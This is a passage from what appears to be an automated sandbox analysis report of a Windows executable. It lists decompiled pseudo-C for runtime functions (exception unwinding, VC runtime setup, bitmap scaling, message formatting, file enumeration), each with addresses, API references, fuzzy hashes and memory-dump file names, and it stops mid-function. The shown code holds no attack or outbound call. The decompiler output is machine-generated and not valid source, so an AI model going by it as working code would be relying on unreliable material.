				void* __esi;
				void* __ebp;
				void* _t25;
				void* _t27;
				void* _t28;
				intOrPtr _t30;
				intOrPtr* _t32;
				void* _t34;

				_t29 = __edx;
				_t27 = __ebx;
				_t36 = _a28;
				_t30 = _a8;
				if(_a28 != 0) {
					_push(_a28);
					_push(_a24);
					_push(_t30);
					_push(_a4);
					E001B20D8(__edx, _t36);
					_t34 = _t34 + 0x10;
				}
				_t37 = _a40;
				_push(_a4);
				if(_a40 != 0) {
					_push(_a40);
				} else {
					_push(_t30);
				}
				E001AF1DB(_t28);
				_t32 = _a32;
				_push( *_t32);
				_push(_a20);
				_push(_a16);
				_push(_t30);
				E001B22DA(_t27, _t28, _t29, _t30, _t37);
				_push(0x100);
				_push(_a36);
				 *((intOrPtr*)(_t30 + 8)) =  *((intOrPtr*)(_t32 + 4)) + 1;
				_push( *((intOrPtr*)(_a24 + 0xc)));
				_push(_a20);
				_push(_a12);
				_push(_t30);
				_push(_a4);
				_t25 = E001B1893(_t29, _t32, _t37);
				if(_t25 != 0) {
					E001AF1A9(_t25, _t30);
					return _t25;
				}
				return _t25;
			}

0x001b1a89
0x001b1a89
0x001b1a8c
0x001b1a91
0x001b1a94
0x001b1a96
0x001b1a99
0x001b1a9c
0x001b1a9d
0x001b1aa0
0x001b1aa5
0x001b1aa5
0x001b1aa8
0x001b1aac
0x001b1aaf
0x001b1ab4
0x001b1ab1
0x001b1ab1
0x001b1ab1
0x001b1ab7
0x001b1abd
0x001b1ac0
0x001b1ac2
0x001b1ac5
0x001b1ac8
0x001b1ac9
0x001b1ad2
0x001b1ad7
0x001b1ada
0x001b1ae0
0x001b1ae3
0x001b1ae6
0x001b1ae9
0x001b1aea
0x001b1aed
0x001b1af8
0x001b1afc
0x00000000
0x001b1afc
0x001b1b03

APIs

___BuildCatchObject.LIBVCRUNTIME ref: 001B1AA0

Part of subcall function 001B20D8: ___AdjustPointer.LIBCMT ref: 001B2122

_UnwindNestedFrames.LIBCMT ref: 001B1AB7
___FrameUnwindToState.LIBVCRUNTIME ref: 001B1AC9
CallCatchBlock.LIBVCRUNTIME ref: 001B1AED

Memory Dump Source

Source File: 00000000.00000002.288603648.0000000000191000.00000020.00020000.sdmp, Offset: 00190000, based on PE: true

Associated: 00000000.00000002.288597781.0000000000190000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.288634077.00000000001C2000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.288643779.00000000001CD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288650289.00000000001D4000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288658464.00000000001F0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288663647.00000000001F1000.00000002.00020000.sdmp Download File

Similarity

API ID: CatchUnwind$AdjustBlockBuildCallFrameFramesNestedObjectPointerState
String ID:
API String ID: 2633735394-0
Opcode ID: 7d12082e9d69d4eb274960970e4ac3fc094051ebbb053271e04eeb65a8542b8b
Instruction ID: 255a7ccb423b2ce03cc775ce4d7c87079dc08f8ec69f5c922d2958881ff0e4cf
Opcode Fuzzy Hash: 7d12082e9d69d4eb274960970e4ac3fc094051ebbb053271e04eeb65a8542b8b
Instruction Fuzzy Hash: 12014C32000148FBDF12AFA5CC01EDA3BBAFF59754F154514FD1866120D332E8A1DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 001B15E6, Relevance: 6.0, APIs: 4, Instructions: 14
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E001B15E6() {
				void* _t4;
				void* _t8;

				E001B29B7();
				E001B294B();
				if(E001B268E() != 0) {
					_t4 = E001B1726(_t8, __eflags);
					__eflags = _t4;
					if(_t4 != 0) {
						return 1;
					} else {
						E001B26CA();
						goto L1;
					}
				} else {
					L1:
					return 0;
				}
			}

0x001b15e6
0x001b15eb
0x001b15f7
0x001b15fc
0x001b1601
0x001b1603
0x001b160e
0x001b1605
0x001b1605
0x00000000
0x001b1605
0x001b15f9
0x001b15f9
0x001b15fb
0x001b15fb

APIs

___vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 001B15E6
___vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 001B15EB
___vcrt_initialize_locks.LIBVCRUNTIME ref: 001B15F0

Part of subcall function 001B268E: ___vcrt_InitializeCriticalSectionEx.LIBVCRUNTIME ref: 001B269F

___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 001B1605

Memory Dump Source

Source File: 00000000.00000002.288603648.0000000000191000.00000020.00020000.sdmp, Offset: 00190000, based on PE: true

Associated: 00000000.00000002.288597781.0000000000190000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.288634077.00000000001C2000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.288643779.00000000001CD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288650289.00000000001D4000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288658464.00000000001F0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288663647.00000000001F1000.00000002.00020000.sdmp Download File

Similarity

API ID: CriticalInitializeSection___vcrt____vcrt_initialize_locks___vcrt_initialize_pure_virtual_call_handler___vcrt_initialize_winapi_thunks___vcrt_uninitialize_locks
String ID:
API String ID: 1761009282-0
Opcode ID: e1efccc91d6ca86c87a370a4cfe5ee176f52a00580c29e2aebafd7fd9b0014c7
Instruction ID: 163b92bf61ad2e71abbe2562c789a839652a36bafea9b1c929d552e73fb6f42a
Opcode Fuzzy Hash: e1efccc91d6ca86c87a370a4cfe5ee176f52a00580c29e2aebafd7fd9b0014c7
Instruction Fuzzy Hash: 48C04868400662B01C303AB523776ED23000DB37C9FC714C2FD56AB02BAFAA080F2872

Uniqueness

Uniqueness Score: -1.00%

Function 001A975D, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 188
COMMON

Download Yara Rule

C-Code - Quality: 51%

			E001A975D(void* __edx, long long __fp0, void* _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v0;
				signed int _v4;
				void _v68;
				signed int _v72;
				signed int _v76;
				char _v112;
				intOrPtr _v116;
				intOrPtr* _v120;
				short _v122;
				short _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				intOrPtr* _v140;
				char _v144;
				intOrPtr* _v152;
				intOrPtr _v156;
				intOrPtr* _v164;
				char _v180;
				intOrPtr* _v184;
				intOrPtr* _v192;
				intOrPtr* _v200;
				intOrPtr* _v212;
				signed int _v216;
				signed int _v220;
				intOrPtr* _v224;
				char _v228;
				intOrPtr _v232;
				void* __edi;
				signed int _t71;
				intOrPtr* _t77;
				void* _t78;
				intOrPtr* _t79;
				intOrPtr* _t81;
				short _t89;
				intOrPtr* _t93;
				intOrPtr* _t95;
				intOrPtr* _t97;
				intOrPtr* _t101;
				signed int _t103;
				intOrPtr* _t111;
				intOrPtr* _t113;
				intOrPtr* _t115;
				signed int _t120;
				intOrPtr _t124;
				intOrPtr* _t132;
				intOrPtr* _t134;
				void* _t146;
				void* _t149;
				signed int _t152;
				void* _t154;
				long long* _t155;
				long long _t158;

				_t158 = __fp0;
				if(E001A960F() != 0) {
					_t146 = _a4;
					GetObjectW(_t146, 0x18,  &_v68);
					_t152 = _v4;
					_t120 = _v0;
					asm("cdq");
					_t71 = _v72 * _t152 / _v76;
					if(_t71 < _t120) {
						_t120 = _t71;
					}
					_t149 = 0;
					_push( &_v112);
					_push(0x1c33ac);
					_push(1);
					_push(0);
					_push(0x1c417c);
					if( *0x1cdff4() < 0) {
						L18:
						return _t146;
					} else {
						_t77 = _v132;
						_t78 =  *((intOrPtr*)( *_t77 + 0x54))(_t77, _t146, 0, 2,  &_v128);
						_t79 = _v152;
						if(_t78 >= 0) {
							_v144 = 0;
							_push( &_v144);
							_push(_t79);
							if( *((intOrPtr*)( *_t79 + 0x28))() >= 0) {
								_t81 = _v152;
								asm("fldz");
								_push(0);
								_t124 =  *_t81;
								_push(_t124);
								_push(_t124);
								 *_t155 = _t158;
								_push(0);
								_push(0);
								_push(0x1c418c);
								_push(_v156);
								_push(_t81);
								if( *((intOrPtr*)(_t124 + 0x20))() >= 0) {
									E001AE920(_t146,  &_v136, 0, 0x2c);
									_v136 = 0x28;
									_v132 = _t152;
									_v120 = 0;
									_v128 =  ~_t120;
									_v124 = 1;
									_t89 = 0x20;
									_v122 = _t89;
									_t154 =  *0x1cdedc(0,  &_v136, 0,  &_v180, 0, 0);
									asm("sbb ecx, ecx");
									if(( ~_t154 & 0x7ff8fff2) + 0x8007000e >= 0) {
										_t132 = _v216;
										 *((intOrPtr*)( *_t132 + 0x2c))(_t132,  &_v112);
										_t101 = _v120;
										 *((intOrPtr*)( *_t101 + 0x20))(_t101, _v220, _v116, _t120, 3);
										_t103 = _v136;
										_push(_v232);
										_t134 = _v140;
										_v220 = _t103;
										_v228 = 0;
										_v224 = 0;
										_v216 = _t120;
										_push(_t103 * _t120 << 2);
										_push(_v136 << 2);
										_push( &_v228);
										_push(_t134);
										if( *((intOrPtr*)( *_t134 + 0x1c))() < 0) {
											DeleteObject(_t154);
										} else {
											_t149 = _t154;
										}
										_t111 = _v164;
										 *((intOrPtr*)( *_t111 + 8))(_t111);
									}
									_t93 = _v212;
									 *((intOrPtr*)( *_t93 + 8))(_t93);
									_t95 = _v212;
									 *((intOrPtr*)( *_t95 + 8))(_t95);
									_t97 = _v224;
									 *((intOrPtr*)( *_t97 + 8))(_t97);
									if(_t149 != 0) {
										_t146 = _t149;
									}
									goto L18;
								}
								_t113 = _v184;
								 *((intOrPtr*)( *_t113 + 8))(_t113);
							}
							_t115 = _v192;
							 *((intOrPtr*)( *_t115 + 8))(_t115);
							_t79 = _v200;
						}
						 *((intOrPtr*)( *_t79 + 8))(_t79);
						goto L18;
					}
				}
				_push(_a12);
				_push(_a8);
				_push(_a4);
				return E001A9954();
			}

0x001a975d
0x001a9767
0x001a9782
0x001a978e
0x001a9798
0x001a979f
0x001a97a3
0x001a97a4
0x001a97aa
0x001a97ac
0x001a97ac
0x001a97b3
0x001a97b5
0x001a97b6
0x001a97be
0x001a97bf
0x001a97c0
0x001a97cd
0x001a9948
0x00000000
0x001a97d3
0x001a97d3
0x001a97e3
0x001a97e8
0x001a97ec
0x001a97f9
0x001a9803
0x001a9804
0x001a980a
0x001a981c
0x001a9820
0x001a9822
0x001a9823
0x001a9825
0x001a9826
0x001a9827
0x001a982a
0x001a982b
0x001a982c
0x001a9831
0x001a9835
0x001a983b
0x001a9851
0x001a9859
0x001a9863
0x001a9869
0x001a986d
0x001a9876
0x001a987b
0x001a987e
0x001a9895
0x001a989b
0x001a98a9
0x001a98ab
0x001a98b7
0x001a98ba
0x001a98cf
0x001a98d2
0x001a98d6
0x001a98da
0x001a98de
0x001a98e5
0x001a98e9
0x001a98ed
0x001a98f6
0x001a9901
0x001a9906
0x001a9907
0x001a990d
0x001a9914
0x001a990f
0x001a990f
0x001a990f
0x001a991a
0x001a9921
0x001a9921
0x001a9924
0x001a992b
0x001a992e
0x001a9935
0x001a9938
0x001a993f
0x001a9944
0x001a9946
0x001a9946
0x00000000
0x001a9944
0x001a983d
0x001a9844
0x001a9844
0x001a980c
0x001a9813
0x001a9816
0x001a9816
0x001a97f1
0x00000000
0x001a97f1
0x001a97cd
0x001a9769
0x001a976d
0x001a9771
0x00000000

APIs

Part of subcall function 001A960F: GetDC.USER32(00000000), ref: 001A9613
Part of subcall function 001A960F: GetDeviceCaps.GDI32(00000000,0000000C), ref: 001A961E
Part of subcall function 001A960F: ReleaseDC.USER32(00000000,00000000), ref: 001A9629

GetObjectW.GDI32(?,00000018,?,00000000,?,77125B70), ref: 001A978E

Part of subcall function 001A9954: GetDC.USER32(00000000), ref: 001A995D
Part of subcall function 001A9954: GetObjectW.GDI32(?,00000018,?,?,?,77125B70,?,?,?,?,?,001A977A,?,?,?), ref: 001A998C
Part of subcall function 001A9954: ReleaseDC.USER32(00000000,?), ref: 001A9A20

Strings

(, xrefs: 001A9859

Memory Dump Source

Source File: 00000000.00000002.288603648.0000000000191000.00000020.00020000.sdmp, Offset: 00190000, based on PE: true

Associated: 00000000.00000002.288597781.0000000000190000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.288634077.00000000001C2000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.288643779.00000000001CD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288650289.00000000001D4000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288658464.00000000001F0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288663647.00000000001F1000.00000002.00020000.sdmp Download File

Similarity

API ID: ObjectRelease$CapsDevice
String ID: (
API String ID: 1061551593-3887548279
Opcode ID: e6eb13767496135ac5b42d597c1f390651db1ea72380ff8a6a845f3afd5116b3
Instruction ID: 42649bc8fac897ca7b9c64462bb4846b64176220a86d252f28ba37978b74ddb0
Opcode Fuzzy Hash: e6eb13767496135ac5b42d597c1f390651db1ea72380ff8a6a845f3afd5116b3
Instruction Fuzzy Hash: BA6103B5208301AFD214CFA4C884E6BBBE9FF8A704F10495DF599CB261D771E945CB62

Uniqueness

Uniqueness Score: -1.00%

Function 001A0A9F, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 179
COMMON

Download Yara Rule

C-Code - Quality: 17%

			E001A0A9F(intOrPtr* __ecx) {
				char _v516;
				signed int _t26;
				void* _t28;
				void* _t32;
				signed int _t33;
				signed int _t34;
				signed int _t35;
				signed int _t38;
				void* _t47;
				void* _t48;

				_t41 = __ecx;
				_t44 = __ecx;
				_t26 =  *(__ecx + 0x48);
				_t47 = _t26 - 0x6f;
				if(_t47 > 0) {
					__eflags = _t26 - 0x7d;
					if(_t26 == 0x7d) {
						E001AC339();
						_t28 = E0019DA42(_t41, 0x96);
						return E001A9735( *0x1d75d8, E0019DA42(_t41, 0xc9), _t28, 0);
					}
				} else {
					if(_t47 == 0) {
						_push(0x456);
						L38:
						_push(E0019DA42(_t41));
						_push( *_t44);
						L19:
						_t32 = E001AA57D();
						L11:
						return _t32;
					}
					_t48 = _t26 - 0x16;
					if(_t48 > 0) {
						__eflags = _t26 - 0x38;
						if(__eflags > 0) {
							_t33 = _t26 - 0x39;
							__eflags = _t33;
							if(_t33 == 0) {
								_push(0x8c);
								goto L38;
							}
							_t34 = _t33 - 1;
							__eflags = _t34;
							if(_t34 == 0) {
								_push(0x6f);
								goto L38;
							}
							_t35 = _t34 - 1;
							__eflags = _t35;
							if(_t35 == 0) {
								_push( *((intOrPtr*)(__ecx + 4)));
								_push(0x406);
								goto L13;
							}
							_t38 = _t35 - 9;
							__eflags = _t38;
							if(_t38 == 0) {
								_push(0x343);
								goto L38;
							}
							_t26 = _t38 - 1;
							__eflags = _t26;
							if(_t26 == 0) {
								_push(0x86);
								goto L38;
							}
						} else {
							if(__eflags == 0) {
								_push(0x67);
								goto L38;
							}
							_t26 = _t26 - 0x17;
							__eflags = _t26 - 0xb;
							if(_t26 <= 0xb) {
								switch( *((intOrPtr*)(_t26 * 4 +  &M001A0D63))) {
									case 0:
										_push(0xde);
										goto L18;
									case 1:
										_push(0xe1);
										goto L18;
									case 2:
										_push(0xb4);
										goto L38;
									case 3:
										_push(0x69);
										goto L38;
									case 4:
										_push(0x6a);
										goto L38;
									case 5:
										_push( *((intOrPtr*)(__esi + 4)));
										_push(0x68);
										goto L13;
									case 6:
										_push(0x46f);
										goto L38;
									case 7:
										_push(0x470);
										goto L38;
									case 8:
										_push( *((intOrPtr*)(__esi + 4)));
										_push(0x471);
										goto L13;
									case 9:
										goto L61;
									case 0xa:
										_push( *((intOrPtr*)(__esi + 4)));
										_push(0x71);
										goto L13;
									case 0xb:
										E0019DA42(__ecx, 0xc8) =  &_v516;
										__eax = E00193E41( &_v516, 0x100,  &_v516,  *((intOrPtr*)(__esi + 4)));
										_push( *((intOrPtr*)(__esi + 8)));
										__eax =  &_v516;
										_push( &_v516);
										return E001AA57D( *__esi, L"%s: %s");
								}
							}
						}
					} else {
						if(_t48 == 0) {
							_push( *__ecx);
							_push(0xdd);
							L23:
							E0019DA42(_t41);
							L7:
							_push(0);
							L8:
							return E001AA57D();
						}
						if(_t26 <= 0x15) {
							switch( *((intOrPtr*)(_t26 * 4 +  &M001A0D0B))) {
								case 0:
									_push( *__esi);
									_push(L"%ls");
									_push(">");
									goto L8;
								case 1:
									_push( *__ecx);
									_push(L"%ls");
									goto L7;
								case 2:
									_push(0);
									__eax = E001A9D55();
									goto L11;
								case 3:
									_push( *((intOrPtr*)(__esi + 4)));
									_push(0x7b);
									goto L13;
								case 4:
									_push( *((intOrPtr*)(__esi + 4)));
									_push(0x7a);
									goto L13;
								case 5:
									_push( *((intOrPtr*)(__esi + 4)));
									_push(0x7c);
									goto L13;
								case 6:
									_push( *((intOrPtr*)(__esi + 4)));
									_push(0xca);
									goto L13;
								case 7:
									_push(0x70);
									L18:
									_push(E0019DA42(_t41));
									_push(0);
									goto L19;
								case 8:
									_push( *((intOrPtr*)(__esi + 4)));
									_push(0x72);
									goto L13;
								case 9:
									_push( *((intOrPtr*)(__esi + 4)));
									_push(0x78);
									goto L13;
								case 0xa:
									_push( *__esi);
									_push(0x85);
									goto L23;
								case 0xb:
									_push( *__esi);
									_push(0x204);
									goto L23;
								case 0xc:
									_push( *((intOrPtr*)(__esi + 4)));
									_push(0x84);
									goto L13;
								case 0xd:
									_push( *((intOrPtr*)(__esi + 4)));
									_push(0x83);
									goto L13;
								case 0xe:
									goto L61;
								case 0xf:
									_push( *((intOrPtr*)(__esi + 8)));
									_push( *((intOrPtr*)(__esi + 4)));
									__eax = E0019DA42(__ecx, 0xd2);
									return __eax;
								case 0x10:
									_push( *((intOrPtr*)(__esi + 4)));
									_push(0x79);
									goto L13;
								case 0x11:
									_push( *((intOrPtr*)(__esi + 4)));
									_push(0xdc);
									L13:
									_push(E0019DA42(_t41));
									_push( *_t44);
									goto L8;
							}
						}
					}
				}
				L61:
				return _t26;
			}

0x001a0a9f
0x001a0aa9
0x001a0aab
0x001a0aae
0x001a0ab1
0x001a0cd8
0x001a0cdb
0x001a0cdd
0x001a0ce9
0x00000000
0x001a0d00
0x001a0ab7
0x001a0ab7
0x001a0cce
0x001a0bfb
0x001a0c00
0x001a0c01
0x001a0b3e
0x001a0b3e
0x001a0b07
0x00000000
0x001a0b07
0x001a0abd
0x001a0ac0
0x001a0bc0
0x001a0bc3
0x001a0c83
0x001a0c83
0x001a0c86
0x001a0cc4
0x00000000
0x001a0cc4
0x001a0c88
0x001a0c88
0x001a0c8b
0x001a0cbd
0x00000000
0x001a0cbd
0x001a0c8d
0x001a0c8d
0x001a0c90
0x001a0cb0
0x001a0cb3
0x00000000
0x001a0cb3
0x001a0c92
0x001a0c92
0x001a0c95
0x001a0ca6
0x00000000
0x001a0ca6
0x001a0c97
0x001a0c97
0x001a0c9a
0x001a0c9c
0x00000000
0x001a0c9c
0x001a0bc9
0x001a0bc9
0x001a0c7c
0x00000000
0x001a0c7c
0x001a0bcf
0x001a0bd2
0x001a0bd5
0x001a0bdb
0x00000000
0x001a0be2
0x00000000
0x00000000
0x001a0bec
0x00000000
0x00000000
0x001a0bf6
0x00000000
0x00000000
0x001a0c08
0x00000000
0x00000000
0x001a0c0c
0x00000000
0x00000000
0x001a0c10
0x001a0c13
0x00000000
0x00000000
0x001a0c1a
0x00000000
0x00000000
0x001a0c21
0x00000000
0x00000000
0x001a0c28
0x001a0c2b
0x00000000
0x00000000
0x00000000
0x00000000
0x001a0c35
0x001a0c38
0x00000000
0x00000000
0x001a0c4d
0x001a0c59
0x001a0c5e
0x001a0c61
0x001a0c67
0x00000000
0x00000000
0x001a0bdb
0x001a0bd5
0x001a0ac6
0x001a0ac6
0x001a0bb7
0x001a0bb9
0x001a0b5b
0x001a0b5b
0x001a0ae3
0x001a0ae3
0x001a0ae5
0x00000000
0x001a0aea
0x001a0acf
0x001a0ad5
0x00000000
0x001a0af2
0x001a0af4
0x001a0af9
0x00000000
0x00000000
0x001a0adc
0x001a0ade
0x00000000
0x00000000
0x001a0b00
0x001a0b02
0x00000000
0x00000000
0x001a0b0d
0x001a0b10
0x00000000
0x00000000
0x001a0b1c
0x001a0b1f
0x00000000
0x00000000
0x001a0b23
0x001a0b26
0x00000000
0x00000000
0x001a0b2a
0x001a0b2d
0x00000000
0x00000000
0x001a0b34
0x001a0b36
0x001a0b3b
0x001a0b3c
0x00000000
0x00000000
0x001a0b46
0x001a0b49
0x00000000
0x00000000
0x001a0b4d
0x001a0b50
0x00000000
0x00000000
0x001a0b54
0x001a0b56
0x00000000
0x00000000
0x001a0b63
0x001a0b65
0x00000000
0x00000000
0x001a0b6c
0x001a0b6f
0x00000000
0x00000000
0x001a0b76
0x001a0b79
0x00000000
0x00000000
0x00000000
0x00000000
0x001a0b80
0x001a0b83
0x001a0b8b
0x00000000
0x00000000
0x001a0ba0
0x001a0ba3
0x00000000
0x00000000
0x001a0baa
0x001a0bad
0x001a0b12
0x001a0b17
0x001a0b18
0x00000000
0x00000000
0x001a0ad5
0x001a0acf
0x001a0ac0
0x001a0d09
0x001a0d09

APIs

_swprintf.LIBCMT ref: 001A0C59

Strings

%s: %s, xrefs: 001A0C68
%ls, xrefs: 001A0ADE, 001A0AF4

Memory Dump Source

Source File: 00000000.00000002.288603648.0000000000191000.00000020.00020000.sdmp, Offset: 00190000, based on PE: true

Associated: 00000000.00000002.288597781.0000000000190000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.288634077.00000000001C2000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.288643779.00000000001CD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288650289.00000000001D4000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288658464.00000000001F0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288663647.00000000001F1000.00000002.00020000.sdmp Download File

Similarity

API ID: _swprintf
String ID: %ls$%s: %s
API String ID: 589789837-2259941744
Opcode ID: 7be2025650fe7661209993384559b36d3d726b4c7dd15b5ff609b430567adc79
Instruction ID: 24928e7a3399d959597f50c4b4d933b467f4b31ca8c8b92001c7c47f4db1cd9c
Opcode Fuzzy Hash: 7be2025650fe7661209993384559b36d3d726b4c7dd15b5ff609b430567adc79
Instruction Fuzzy Hash: 1A514C3E68C300F9E62B1FD08E46F3235655B0FF04F618906B797654D6D79298607622

Uniqueness

Uniqueness Score: -1.00%

Function 001B9E43, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 168
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E001B9E43(void* __ebx, void* __edi, void* __esi, signed int _a4, signed int _a8, intOrPtr _a12) {
				intOrPtr _v0;
				char _v6;
				char _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v36;
				intOrPtr* _v64;
				intOrPtr _v96;
				intOrPtr* _v100;
				CHAR* _v104;
				signed int _v116;
				char _v290;
				signed int _v291;
				struct _WIN32_FIND_DATAA _v336;
				union _FINDEX_INFO_LEVELS _v340;
				signed int _v344;
				signed int _v348;
				intOrPtr _v440;
				intOrPtr* _t80;
				signed int _t82;
				signed int _t87;
				signed int _t91;
				signed int _t93;
				signed int _t95;
				signed int _t96;
				signed int _t100;
				signed int _t103;
				signed int _t108;
				signed int _t111;
				intOrPtr _t113;
				signed char _t115;
				union _FINDEX_INFO_LEVELS _t123;
				signed int _t128;
				signed int _t131;
				void* _t136;
				void* _t138;
				signed int _t139;
				signed int _t142;
				signed int _t144;
				signed int _t146;
				signed int* _t147;
				signed int _t150;
				void* _t153;
				CHAR* _t154;
				char _t157;
				char _t159;
				intOrPtr* _t162;
				void* _t163;
				intOrPtr* _t164;
				signed int _t166;
				void* _t168;
				intOrPtr* _t169;
				signed int _t173;
				signed int _t177;
				signed int _t178;
				intOrPtr* _t183;
				void* _t192;
				intOrPtr _t193;
				signed int _t195;
				signed int _t196;
				signed int _t198;
				signed int _t199;
				signed int _t201;
				union _FINDEX_INFO_LEVELS _t202;
				signed int _t207;
				signed int _t209;
				signed int _t210;
				void* _t212;
				intOrPtr _t213;
				void* _t214;
				signed int _t218;
				void* _t220;
				signed int _t221;
				void* _t222;
				void* _t223;
				void* _t224;
				signed int _t225;
				void* _t226;
				void* _t227;

				_t80 = _a8;
				_t223 = _t222 - 0x20;
				if(_t80 != 0) {
					_t207 = _a4;
					_t159 = 0;
					 *_t80 = 0;
					_t198 = 0;
					_t150 = 0;
					_v36 = 0;
					_v336.cAlternateFileName = 0;
					_v28 = 0;
					__eflags =  *_t207;
					if( *_t207 == 0) {
						L9:
						_v12 = _v12 & 0x00000000;
						_t82 = _t150 - _t198;
						_v8 = _t159;
						_t190 = (_t82 >> 2) + 1;
						__eflags = _t150 - _t198;
						_v16 = (_t82 >> 2) + 1;
						asm("sbb esi, esi");
						_t209 =  !_t207 & _t82 + 0x00000003 >> 0x00000002;
						__eflags = _t209;
						if(_t209 != 0) {
							_t196 = _t198;
							_t157 = _t159;
							do {
								_t183 =  *_t196;
								_t17 = _t183 + 1; // 0x1
								_v8 = _t17;
								do {
									_t142 =  *_t183;
									_t183 = _t183 + 1;
									__eflags = _t142;
								} while (_t142 != 0);
								_t157 = _t157 + 1 + _t183 - _v8;
								_t196 = _t196 + 4;
								_t144 = _v12 + 1;
								_v12 = _t144;
								__eflags = _t144 - _t209;
							} while (_t144 != _t209);
							_t190 = _v16;
							_v8 = _t157;
							_t150 = _v336.cAlternateFileName;
						}
						_t210 = E001B6F0C(_t190, _v8, 1);
						_t224 = _t223 + 0xc;
						__eflags = _t210;
						if(_t210 != 0) {
							_t87 = _t210 + _v16 * 4;
							_v20 = _t87;
							_t191 = _t87;
							_v16 = _t87;
							__eflags = _t198 - _t150;
							if(_t198 == _t150) {
								L23:
								_t199 = 0;
								__eflags = 0;
								 *_a8 = _t210;
								goto L24;
							} else {
								_t93 = _t210 - _t198;
								__eflags = _t93;
								_v24 = _t93;
								do {
									_t162 =  *_t198;
									_v12 = _t162 + 1;
									do {
										_t95 =  *_t162;
										_t162 = _t162 + 1;
										__eflags = _t95;
									} while (_t95 != 0);
									_t163 = _t162 - _v12;
									_t35 = _t163 + 1; // 0x1
									_t96 = _t35;
									_push(_t96);
									_v12 = _t96;
									_t100 = E001BDD71(_t163, _t191, _v20 - _t191 + _v8,  *_t198);
									_t224 = _t224 + 0x10;
									__eflags = _t100;
									if(_t100 != 0) {
										_push(0);
										_push(0);
										_push(0);
										_push(0);
										_push(0);
										E001B7DBB();
										asm("int3");
										_t220 = _t224;
										_push(_t163);
										_t164 = _v64;
										_t47 = _t164 + 1; // 0x1
										_t192 = _t47;
										do {
											_t103 =  *_t164;
											_t164 = _t164 + 1;
											__eflags = _t103;
										} while (_t103 != 0);
										_push(_t198);
										_t201 = _a8;
										_t166 = _t164 - _t192 + 1;
										_v12 = _t166;
										__eflags = _t166 - (_t103 | 0xffffffff) - _t201;
										if(_t166 <= (_t103 | 0xffffffff) - _t201) {
											_push(_t150);
											_t50 = _t201 + 1; // 0x1
											_t153 = _t50 + _t166;
											_t212 = E001B7B1B(_t166, _t153, 1);
											_t168 = _t210;
											__eflags = _t201;
											if(_t201 == 0) {
												L34:
												_push(_v12);
												_t153 = _t153 - _t201;
												_t108 = E001BDD71(_t168, _t212 + _t201, _t153, _v0);
												_t225 = _t224 + 0x10;
												__eflags = _t108;
												if(__eflags != 0) {
													goto L37;
												} else {
													_t136 = E001BA212(_a12, _t192, __eflags, _t212);
													E001B7A50(0);
													_t138 = _t136;
													goto L36;
												}
											} else {
												_push(_t201);
												_t139 = E001BDD71(_t168, _t212, _t153, _a4);
												_t225 = _t224 + 0x10;
												__eflags = _t139;
												if(_t139 != 0) {
													L37:
													_push(0);
													_push(0);
													_push(0);
													_push(0);
													_push(0);
													E001B7DBB();
													asm("int3");
													_push(_t220);
													_t221 = _t225;
													_t226 = _t225 - 0x150;
													_t111 =  *0x1cd668; // 0x44aa1787
													_v116 = _t111 ^ _t221;
													_t169 = _v100;
													_push(_t153);
													_t154 = _v104;
													_push(_t212);
													_t213 = _v96;
													_push(_t201);
													_v440 = _t213;
													while(1) {
														__eflags = _t169 - _t154;
														if(_t169 == _t154) {
															break;
														}
														_t113 =  *_t169;
														__eflags = _t113 - 0x2f;
														if(_t113 != 0x2f) {
															__eflags = _t113 - 0x5c;
															if(_t113 != 0x5c) {
																__eflags = _t113 - 0x3a;
																if(_t113 != 0x3a) {
																	_t169 = E001BDDC0(_t154, _t169);
																	continue;
																}
															}
														}
														break;
													}
													_t193 =  *_t169;
													__eflags = _t193 - 0x3a;
													if(_t193 != 0x3a) {
														L47:
														_t202 = 0;
														__eflags = _t193 - 0x2f;
														if(_t193 == 0x2f) {
															L51:
															_t115 = 1;
															__eflags = 1;
														} else {
															__eflags = _t193 - 0x5c;
															if(_t193 == 0x5c) {
																goto L51;
															} else {
																__eflags = _t193 - 0x3a;
																if(_t193 == 0x3a) {
																	goto L51;
																} else {
																	_t115 = 0;
																}
															}
														}
														asm("sbb eax, eax");
														_v344 =  ~(_t115 & 0x000000ff) & _t169 - _t154 + 0x00000001;
														E001AE920(_t202,  &_v336, _t202, 0x140);
														_t227 = _t226 + 0xc;
														_t214 = FindFirstFileExA(_t154, _t202,  &_v336, _t202, _t202, _t202);
														_t123 = _v340;
														__eflags = _t214 - 0xffffffff;
														if(_t214 != 0xffffffff) {
															_t173 =  *((intOrPtr*)(_t123 + 4)) -  *_t123;
															__eflags = _t173;
															_v348 = _t173 >> 2;
															do {
																__eflags = _v336.cFileName - 0x2e;
																if(_v336.cFileName != 0x2e) {
																	L64:
																	_push(_t123);
																	_push(_v344);
																	_t123 =  &(_v336.cFileName);
																	_push(_t154);
																	_push(_t123);
																	L28();
